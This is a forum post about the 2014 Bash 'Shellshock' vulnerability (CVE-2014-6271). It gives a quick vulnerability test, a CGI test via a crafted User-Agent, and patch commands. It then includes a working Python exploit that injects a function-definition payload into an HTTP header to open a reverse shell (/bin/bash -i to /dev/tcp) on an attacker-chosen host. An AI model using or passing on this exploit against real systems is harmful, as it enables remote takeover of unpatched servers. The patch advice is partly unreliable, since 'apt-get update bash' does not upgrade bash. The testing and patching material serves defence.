Jump to content

Recommended Posts

Posted (edited)

Stephane Chazelas U.K. @ robotics company SeeByte find a bug in BASH

https://securityblog.redhat.com/

A quick test to check if you are vulnerable (debian, ubuntu, unix (FreeBSD).. )

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

if your terminal respond : vulnerable you are vulnerable
The problem is the following -> the code continue to execute after the ; -> and here you can inject malicious code ...

Also a CGI-TEST

wget -U "() { test;};/usr/bin/touch /tmp/VULNERABLE" myserver/cgi-bin/test

You have to update your bash by paquets in couple of days

CentOS : # yum update bash

Debian : # apt-get update bash

FreeBSD : # portsnap fetch update


https://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025

-------

Example of attack could be perform (in this example a Reverse Shell by http header)

#CVE-2014-6271 cgi-bin reverse shell

import httplib,urllib,sys

if (len(sys.argv)<4):
    print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
    exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
    "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data
Edited by Armaal

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...